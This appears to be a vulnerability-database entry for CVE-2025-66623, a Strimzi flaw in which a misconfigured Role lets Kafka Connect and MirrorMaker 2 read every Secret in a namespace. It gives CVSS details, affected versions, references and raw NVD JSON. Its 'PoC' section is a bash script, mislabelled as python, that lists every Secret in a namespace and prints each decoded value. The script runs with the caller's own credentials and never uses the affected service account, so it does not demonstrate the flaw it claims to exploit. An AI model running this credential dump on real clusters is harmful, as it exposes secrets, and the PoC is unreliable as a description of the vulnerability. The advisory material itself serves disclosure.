CVE-2025-66623

Description

Strimzi provides a way to run an Apache Kafka cluster on Kubernetes or OpenShift in various deployment configurations. From 0.47.0 and prior to 0.49.1, in some situations, Strimzi creates an incorrect Kubernetes Role which grants the Apache Kafka Connect and Apache Kafka MirrorMaker 2 operands the GET access to all Kubernetes Secrets that exist in the given Kubernetes namespace. The issue is fixed in Strimzi 0.49.1.

CVSS Details

CVSS Score

7.4

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:linuxfoundation:strimzi:*:*:*:*:*:*:*:* - VULNERABLE

Strimzi 0.47.0

Strimzi 0.47.1

Strimzi 0.48.0

Strimzi 0.48.1

Strimzi 0.49.0

Strimzi < 0.49.1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/bin/bash
# CVE-2025-66623 PoC - Strimzi Kafka Connect Secret Access
# Prerequisites: kubectl configured with access to the target namespace

TARGET_NAMESPACE="strimzi"
SECRET_LIST=$(kubectl get secrets -n $TARGET_NAMESPACE -o jsonpath='{.items[*].metadata.name}')

echo "[*] Enumerating Secrets in namespace: $TARGET_NAMESPACE"
for SECRET in $SECRET_LIST; do
    echo "[+] Attempting to read secret: $SECRET"
    kubectl get secret $SECRET -n $TARGET_NAMESPACE -o json | jq -r '.data | to_entries[] | "  Key: \(.key), Value: \(.value | @base64d)"'
done

echo "[*] Checking for Kafka Connect service account"
kubectl get serviceaccount -n $TARGET_NAMESPACE | grep -i connect

echo "[*] Checking RoleBindings for Kafka Connect"
kubectl get rolebindings -n $TARGET_NAMESPACE -o wide | grep -i connect

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-66623
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-66623
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-66623/
[4] VulDB https://vuldb.com/cve/CVE-2025-66623
[5] https://github.com/strimzi/strimzi-kafka-operator/commit/c8a14935e99c91eb0dd865431f46515da9f82ccc
[6] https://github.com/strimzi/strimzi-kafka-operator/security/advisories/GHSA-xrhh-hx36-485q

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-66623", "sourceIdentifier": "[email protected]", "published": "2025-12-05T19:15:52.910", "lastModified": "2026-03-04T20:32:24.260", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Strimzi provides a way to run an Apache Kafka cluster on Kubernetes or OpenShift in various deployment configurations. From 0.47.0 and prior to 0.49.1, in some situations, Strimzi creates an incorrect Kubernetes Role which grants the Apache Kafka Connect and Apache Kafka MirrorMaker 2 operands the GET access to all Kubernetes Secrets that exist in the given Kubernetes namespace. The issue is fixed in Strimzi 0.49.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N", "baseScore": 7.4, "baseSeverity": "HIGH", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 4.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}, {"lang": "en", "value": "CWE-863"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:linuxfoundation:strimzi:*:*:*:*:*:*:*:*", "versionEndExcluding": "0.49.1", "matchCriteriaId": "55FC7CB9-D19F-4293-ACE7-38285D1112D5"}]}]}], "references": [{"url": "https://github.com/strimzi/strimzi-kafka-operator/commit/c8a14935e99c91eb0dd865431f46515da9f82ccc", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/strimzi/strimzi-kafka-operator/security/advisories/GHSA-xrhh-hx36-485q", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}